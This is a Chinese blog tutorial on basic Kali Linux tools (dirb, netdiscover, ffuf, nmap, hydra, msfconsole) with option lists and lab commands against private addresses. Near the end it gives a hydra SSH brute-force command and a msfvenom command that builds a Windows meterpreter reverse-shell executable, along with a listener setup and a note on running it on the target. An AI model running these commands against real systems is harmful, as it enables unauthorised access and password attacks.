您现在的位置是:首页 > 正文

kali中的一些工具简单使用dirb、netdiscover、ffuf、nmap、sqlmap、hydra、msfconsole

2024-01-30 22:34:10阅读 0


dirb

dirb <目标URL> <字典文件> [选项]

<目标URL>:要扫描的目标URL,例如:http://example.com。
<字典文件>:用于扫描的字典文件的路径。Dirb附带了一些默认字典文件,例如:/usr/share/dirb/wordlists/common.txt。
以下是一些常用的选项:

-o <输出文件>:将扫描结果保存到指定的输出文件中。
-w:显示警告信息。
-r:递归扫描子目录。
-R <N>:限制递归层数为N。
-X <扩展名>:仅扫描指定扩展名的文件。
-x <排除扩展名>:排除指定扩展名的文件。
-S:在扫描结果中显示HTTP状态码。
-c <编码>:指定URL编码。
-t <线程数>:指定并发线程数。
这只是一些常见的选项,Dirb还有其他可用的选项。你可以使用dirb --help命令查看完整的帮助文档,其中包含所有可用的选项和示例用法。

测试

dirb http://192.168.1.201/ 

在这里插入图片描述

netdiscover

介绍

Netdiscover是一种网络扫描工具,通过ARP扫描发现活动主机,可以通过主动和被动两种模式进行ARP扫描。它主要为那些没有dhcp服务器的无线网络开发,当您进行Wardriving时。它也可以用于集线器/交换网络。建立在libnet和libpcap之上,它可以被动地检测在线主机,或通过主动发送ARP请求来搜索它们

-i device:您的网络设备
-r range:扫描给定范围而不是自动扫描。例如192.168.6.0/24,/16,/8
-l file:扫描给定文件中包含的范围列表
-p:被动模式:不发送任何内容,仅嗅探
-m file:扫描已知MAC地址和主机名的列表文件
-F filter:自定义pcap过滤器表达式(默认为“arp”)
-s time:每个ARP请求之间的睡眠时间(毫秒)
-c count:发送每个ARP请求的次数(用于丢失数据包的网络)
-n node:用于扫描的最后一个源IP八位字节(从2到253)
-d:忽略自动扫描和快速模式的主配置文件
-f:启用快速模式扫描,节省大量时间,建议用于自动
-P:以适合另一个程序解析的格式打印结果,并在主动扫描后停止
-L:类似于-P,但在主动扫描完成后继续监听
-N:不打印标题。仅当启用-P或-L时有效。
-S:启用每个请求之间的睡眠时间抑制(硬核模式)
如果未启用-r,-l或-p,则netdiscover将扫描常见的局域网地址。

测试

netdiscover -r 172.16.201/24

在这里插入图片描述

ffuf

介绍

FFUF(Fast Web Fuzzer)是一个功能强大的Web模糊测试工具,它提供了多个参数和选项,以便根据需要进行定制。

以下是一些常用的FFUF参数:

-u, --url: 指定目标URL,可以包含FUZZ关键字作为模糊测试的位置标记。
-w, --wordlist: 指定自定义字典文件的路径,用于模糊测试的目录和文件名。
-H, --header: 添加自定义HTTP请求头。
-X, --method: 指定HTTP请求方法,如GET、POST、PUT等。
-d, --data: 指定要发送的POST数据。
-r, --follow-redirects: 跟随重定向。
-c, --cookies: 添加自定义的Cookie。
-t, --threads: 指定并发线程数。
-o, --output: 指定输出文件的路径。
-mc, --match-regex: 使用正则表达式匹配响应内容。
-fc, --filter-status: 过滤特定的HTTP状态码。
-fs, --filter-size: 过滤特定的响应大小。
-fr, --filter-words: 过滤特定的响应内容。
-p, --proxy: 使用代理服务器进行扫描。
-s, --silent: 静默模式,只输出匹配的结果。
这只是一小部分可用参数的示例。你可以使用ffuf --help命令查看完整的参数列表和详细的帮助文档。

FFUF还支持其他高级功能,如自定义扩展名、自定义输出格式、自定义错误码、自定义请求内容等。你可以根据具体的需求和场景选择适当的参数和选项来使用FFUF进行定制化的模糊测试。

nmap

介绍

Nmap是一个开源的Linux命令行工具,用于扫描网络中的IP地址和端口,以及检测已安装的应用程序。它允许网络管理员找到在其网络上运行的设备,发现开放的端口和服务,并检测漏洞1。

下面是一些常用的Nmap参数组合:

获取远程主机的系统类型及开放端口:nmap -sS -P0 -sV -O 或 nmap -sS -P0 -A -v <target>,其中<target>可以是单一IP、主机名、域名或子网2
列出开放了指定端口的主机列表:nmap -sT -p 80 -oG10.0.1.* |grepopen2
在网络寻找所有在线主机:nmap -sP 10.0.1.*2
Ping指定范围内的IP地址:nmap -sP 10.0.1.100-2542

测试

nmap -sS -P0 -sV -O 192.168.1.201

在这里插入图片描述

sqlmap

sqlmap参数详解,功能使用,联合,盲注,报错各种使用

hydra

介绍

Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限1

下面是一些常用的Hydra参数:

-R:从上一次的进度开始爆破。
-s <port>:指定端口。
-l <username>:指定登录的用户名。
-L <username-list>:指定用户名字典。
-p <password>:指定密码。
-t <number>:设置线程数。
-P <passwd-list>:指定密码字典。
-v:显示详细过程。

您可以在命令行中执行hydra -h查看所有命令行选项。注意,安装完成后工具并没有包含密码字典,需要自己生成。如果您想获取一份所有服务的默认用户密码表,可以使用“dpl4hydra.sh”生成一个

爆破ssh

hydra -L u.txt -P p.txt ssh://192.168.56.101

msfconsole

msfconsole上线windows

这里直接上我最常用的
使用msfvenom 生成可执行程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.203 LPORT=4444 -f exe -o reverse_shell.exe

打开msfconsole,进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.203
run

在这里插入图片描述

将刚才生成的木马上传到靶机,执行一下,成功收到shell
在这里插入图片描述
msfconsole设计的东西很多,后面单独总结一篇吧

在这里插入图片描述

网站文章

  • c++ for语句 for循环

    c++ for语句 for循环

    for语句 for语句或者是for循环是最常见的也是复杂的一种循环。 在熟练掌握其语法后,对于一般类似与打印1到N的数字的程序我们都可以快速的写出。 for 语句的基本用法 #include usin...

    2024-01-30 22:33:41
  • HAWQ技术解析(四) —— 启动停止

    HAWQ技术解析(四) —— 启动停止

    前面已经完成了HAWQ的安装部署,也了解了HAWQ的系统架构与主要组件,下面开始使用它。HAWQ作为Hadoop上的一个服务提供给用户,与其它所有服务一样,最基本的操作就是启动、停止、重启服务。要完成...

    2024-01-30 22:33:32
  • CentOS8安装部署cobbler

    CentOS8安装部署cobbler

    CentOS8安装部署cobller 手动安装与自动安装

    2024-01-30 22:33:22
  • linux openssl简单的介绍与实例讲解

    OpenSSL简介SSL是Secure Socket Layer(安全套接层协议)的缩写,可以在Internet上提供秘密性传输。Netscape公司在推出第一个Web浏览器的同时,提出了SSL协议标准,目前已有3.0版本。SSL采用公开密钥技术。其目标是保证两个应用间通信的保密性和可靠性,可在服务器端和用户端同时实现支持。目前,利用公开密钥技术的SSL协议,已成为Inter...

    2024-01-30 22:32:52
  • 搭建自己的 new bing网站----nginx反代(群晖,全docker版)

    搭建自己的 new bing网站----nginx反代(群晖,全docker版)

    本篇教程全萌新向,即便新手也可以看懂演示效果如图。本篇文章以nginx反代为题带来一次new bing 的反代实践,可以搭建在自己的服务器上自用,使用起来更方便一点。go-proxy-bing bin...

    2024-01-30 22:32:45
  • 【Java可执行命令】(十六)诊断命令请求发送工具 jcmd:提供一种简单而强大的方式来管理和监控 Java 进程 ~ 最新发布

    【Java可执行命令】(十六)诊断命令请求发送工具 jcmd:提供一种简单而强大的方式来管理和监控 Java 进程 ~ 最新发布

    jcmd是一个强大且方便的命令行工具,用于与正在运行的 Java 进程进行交互、管理和监控。通过它,可以执行各种诊断命令以了解应用程序的状态,进行调试和性能优化,并提供简洁易用的命令行界面。然而,在使用jcmd时需要注意安全性问题,并且目前仅支持本地 Java 进程的操作。无论是开发人员还是运维人员,都可以从jcmd中获益,并提高对 Java 应用程序的管理和监控能力。

    2024-01-30 22:32:37
  • python获取当前星期几

    python获取当前星期几

    2024-01-30 22:32:08
  • 【Flutter实战 --- 渐变 圆角矩形背景 圆球背景】

    【Flutter实战 --- 渐变 圆角矩形背景 圆球背景】

    需求: 渐变圆球 圆角矩形 单行文本: 多行文本: 关键 圆球: decoration: BoxDecoration 圆角矩形:ClipRRect borderRadius 控制圆角 代码 return Column( children: [ Row( children: [ Padding( padding: const Edge

    2024-01-30 22:32:06
  • kali系统中使用weevely创建木马(合并成图片木马)

    这里写目录标题weevely:kali中的军刀图片木马weevely:kali中的军刀创建木马:weevely generate <password> filename.php连接木马:weevely...

    2024-01-30 22:31:58
  • 计算机中机械硬盘的性能指标,硬盘的性能指标是什么

    计算机中机械硬盘的性能指标,硬盘的性能指标是什么

    硬盘的性能指标,包括硬盘容量、硬盘速度、硬盘转速、接口、缓存、硬盘单碟容量等。硬盘的性能指标,包括硬盘容量、硬盘速度、硬盘转速、接口、缓存、硬盘单碟容量等。硬盘的性能指标一、容量作为计算机系统的数据存...

    2024-01-30 22:31:51